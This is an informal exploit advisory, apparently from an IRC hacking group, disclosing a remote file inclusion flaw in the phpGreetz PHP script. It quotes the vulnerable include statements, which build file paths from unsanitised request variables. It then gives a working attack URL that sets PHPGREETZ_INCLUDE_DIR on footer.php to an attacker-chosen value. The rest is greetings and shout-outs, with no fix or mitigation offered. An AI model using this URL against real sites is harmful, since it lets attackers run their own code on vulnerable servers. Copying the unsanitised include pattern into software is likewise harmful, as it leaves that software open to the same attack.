Author: [email protected] mozi

phpGreetz Remote File Inclusion Vulnerability

Greetz: Raver #phpfreaks eu.undernet.org

Greetz: SpiderZ , fUSiON

Download: http://sourceforge.net/project/showfiles.php?group_id=6127

<? include("$PHPGREETZ_INCLUDE_DIR/language/langlist.php"); ?>
("phpgreetz-global.inc.php");
("$PHPGREETZ_INCLUDE_DIR/language/lang.$session_lang.inc.php");
<td colspan="2" valign="top" align="left"><? include($site_location . "/includes/navigation.php"); ?>
$PHPGREETZ_INCLUDE_DIR = "$site_location/includes";

http://site.com/[path]/includes/footer.php?PHPGREETZ_INCLUDE_DIR=Evil
.

eu.undernet.org #phpfreaks team

RaVeR – [email protected]
mozi – [email protected] [email protected]

#phpfreaks again

heh tnx